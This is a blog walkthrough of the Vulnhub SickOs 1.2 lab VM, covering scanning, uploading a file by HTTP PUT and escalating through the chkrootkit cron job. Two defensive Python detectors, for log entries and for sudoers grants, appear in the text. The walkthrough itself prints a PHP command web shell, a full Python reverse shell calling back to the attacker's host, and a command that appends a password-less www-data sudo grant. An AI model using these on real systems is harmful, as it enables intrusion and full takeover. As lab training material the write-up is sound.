Sunday, 9 October 2016

Vulnhub SickOs 1.2

I appear to have a Vulnhub addiction at the moment! I put this down to having a free weekend so I can hone my skills :)

This VM was tricky towards the end, as the normal scripts etc. didn't work. I certainly had to think outside the box for this one!! It is a great VM and you should definitely give it a go.

So big thanks to Vulnhub and D4rk36 for this :)


scan

root@kali:~# nmap -Pn -sV -p 0-65535 192.168.1.7

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-10-08 16:11 BST
Nmap scan report for 192.168.1.7
Host is up (0.00030s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
MAC Address: 00:0C:29:EB:E6:56 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.06 seconds


ssh


I'll see what ssh yields:


root@kali:~/Downloads# ssh 192.168.1.7
 .oooooo..o  o8o            oooo          .oooooo.                 .o        .oooo.
d8P'    `Y8  `"'            `888         d8P'  `Y8b              o888      .dP""Y88b
Y88bo.      oooo   .ooooo.   888  oooo  888      888  .oooo.o     888            ]8P'
 `"Y8888o.  `888  d88' `"Y8  888 .8P'   888      888 d88(  "8     888          .d8P'
     `"Y88b  888  888        888888.    888      888 `"Y88b.      888        .dP'  
oo     .d8P  888  888   .o8  888 `88b.  `88b    d88' o.  )88b     888  .o. .oP     .o
8""88888P'  o888o `Y8bod8P' o888o o888o  `Y8bood8P'  8""888P'    o888o Y8P 8888888888
                                                                                   
By @D4rk36
root@192.168.1.7's password:

Not a lot apart from nice ASCII art :D

I'll try port 80 then!

http

Navigating to the IP gives the following page.

The source code contains no hints, so I'll see if there is anything hidden:

root@kali:~/Downloads# dirb http://192.168.1.7 -w

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Oct 8 16:22:08 2016
URL_BASE: http://192.168.1.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stoping on warning messages

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.7/ ----
+ http://192.168.1.7/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://192.168.1.7/test/

---- Entering directory: http://192.168.1.7/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

Let's see what /test yields:

Hmmm....

I try to see if there is anything in the way of known weaknesses in lighttpd/1.4.28, but I come away empty-handed.

There must be a way to upload to this page... Hang on!!! What HTTP methods are available on this web page? Can I PUT??

Phew!! I can PUT here. Now to find out how I can achieve this!! Ideally I want a reverse shell, so pentestmonkey's one should do!! (http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
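From the defender's side, an upload like this leaves an obvious trace in the web server's access log: a successful PUT that creates a script file under the web root. The following is an added example, not part of the original write-up, that flags such requests; it assumes CLF-style access log lines (adjust the regex to the server's configured accesslog format) and runs over constructed sample lines modelled on the listable /test/ directory above.

```python
import re

# Prefix of a Common Log Format line: client, ident, user, timestamp, request, status, size.
# Assumption: the server logs in CLF; extra trailing fields (referer, user-agent) are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Extensions a web server would execute rather than serve as static content.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".cgi", ".pl", ".py", ".sh")

def parse_line(line):
    """Return the CLF fields as a dict, or None if the line does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_suspicious_put(entry):
    """A PUT/MOVE that succeeded (2xx) and targets a script file put executable content on the server."""
    if entry is None or entry["method"] not in ("PUT", "MOVE"):
        return False
    if not entry["status"].startswith("2"):
        return False
    path = entry["path"].split("?", 1)[0].lower()
    return path.endswith(SCRIPT_EXT)

def find_uploads(lines):
    """Return (client_ip, path, status) for every suspicious PUT among the given log lines."""
    hits = []
    for line in lines:
        e = parse_line(line)
        if is_suspicious_put(e):
            hits.append((e["ip"], e["path"], int(e["status"])))
    return hits

# Constructed sample log: one successful script upload, one denied, one harmless text file.
SAMPLE_LOG = """\
192.168.1.8 - - [08/Oct/2016:16:30:01 +0100] "OPTIONS /test/ HTTP/1.1" 200 0
192.168.1.8 - - [08/Oct/2016:16:31:12 +0100] "PUT /test/shell.php HTTP/1.1" 201 0
192.168.1.8 - - [08/Oct/2016:16:31:40 +0100] "GET /test/shell.php?cmd=id HTTP/1.1" 200 54
192.168.1.20 - - [08/Oct/2016:16:32:05 +0100] "PUT /test/notes.txt HTTP/1.1" 201 0
192.168.1.20 - - [08/Oct/2016:16:32:09 +0100] "PUT /test/evil.php HTTP/1.1" 403 345
""".splitlines()

if __name__ == "__main__":
    for ip, path, status in find_uploads(SAMPLE_LOG):
        print(f"ALERT: {ip} uploaded executable content {path} (HTTP {status})")
```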

I upload it using nmap's scripting engine:

Check to see if it's there:

Awesome! I set my netcat listener on port 443 then click the file.

Agh!!!

That failed miserably :(

Ok, I wonder if I can get a dirty shell on it? I use the one-liner:

<?php echo shell_exec($_GET['cmd']); ?>

Run the command via the browser:

Sweet!! Now I can try to throw a Python reverse shell back to my listener. I use 443 as it's a web port, so it's less likely to be blocked:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.8",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And the result is:

Hurrah!!!

Now to start enumerating:

Ok, happy with the release details; now to see if I can write anywhere:
I can write to /tmp, but when I upload my enumeration script it doesn't allow me to execute it :(

I start to enumerate manually and eventually find some things in the crontab:

I'll check out the daily one:

Ok, some stuff in here; time to start looking at the code.
After sifting through the code nothing jumps out at me, so I revert to Google to see if the file "chkrootkit" has any flaws.

Exploit-DB comes up trumps with this: https://www.exploit-db.com/exploits/33899/

Awesome!! Now to create that /tmp/update file and leverage me some privileges!!

Inside the file I put:

chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers

This should give my www-data account sudo rights without a password :)
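This is exactly the kind of change a sudoers audit should catch: a service account such as www-data with a NOPASSWD grant, and a file that has (even briefly) left its expected root:root 0440 state. The following is an added example, not part of the original write-up, that parses the common sudoers user-specification shape and flags such grants; the service-account list and the sample file are assumptions.

```python
import re

# Service accounts that should never hold a password-less sudo grant (assumption: typical names).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "lighttpd", "nobody", "mysql", "postgres"}

# user host=(runas) [TAG:] commands -- the only sudoers user-specification shape parsed here.
GRANT_RE = re.compile(
    r'^(?P<user>[^\s#]+)\s+(?P<host>[^\s=]+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\)\s*)?(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$'
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")

def parse_grants(text):
    """Yield user privilege lines as dicts; comments, #include lines, Defaults and aliases are skipped."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "@")) or line.startswith(SKIP_PREFIXES):
            continue
        m = GRANT_RE.match(line)
        if m:
            g = m.groupdict()
            g["tags"] = {t.strip() for t in g["tags"].split(":") if t.strip()}
            g["cmds"] = g["cmds"].strip()
            yield g

def audit_sudoers(text):
    """Flag NOPASSWD grants to service accounts, and password-less ALL grants to anyone else."""
    findings = []
    for g in parse_grants(text):
        if "NOPASSWD" not in g["tags"]:
            continue
        if g["user"].lstrip("%") in SERVICE_ACCOUNTS:
            findings.append(f"{g['user']}: NOPASSWD grant to a service account ({g['cmds']})")
        elif g["cmds"] == "ALL":
            findings.append(f"{g['user']}: password-less ALL")
    return findings

def mode_is_sane(mode, uid):
    """sudo expects /etc/sudoers to be root-owned and mode 0440; anything else is a red flag."""
    return uid == 0 and mode == 0o440

# Constructed sample modelled on an Ubuntu default, with the write-up's appended line at the end.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
#includedir /etc/sudoers.d
www-data ALL=NOPASSWD: ALL
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print("ALERT:", finding)
```

On a live host, feed `audit_sudoers` the contents of /etc/sudoers and each file under /etc/sudoers.d, and pass the results of `os.stat` to `mode_is_sane`.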

The cronjob runs and:

I am root :)

Let's see what is lurking within:

Phew!! This made me stretch the old grey matter!!!!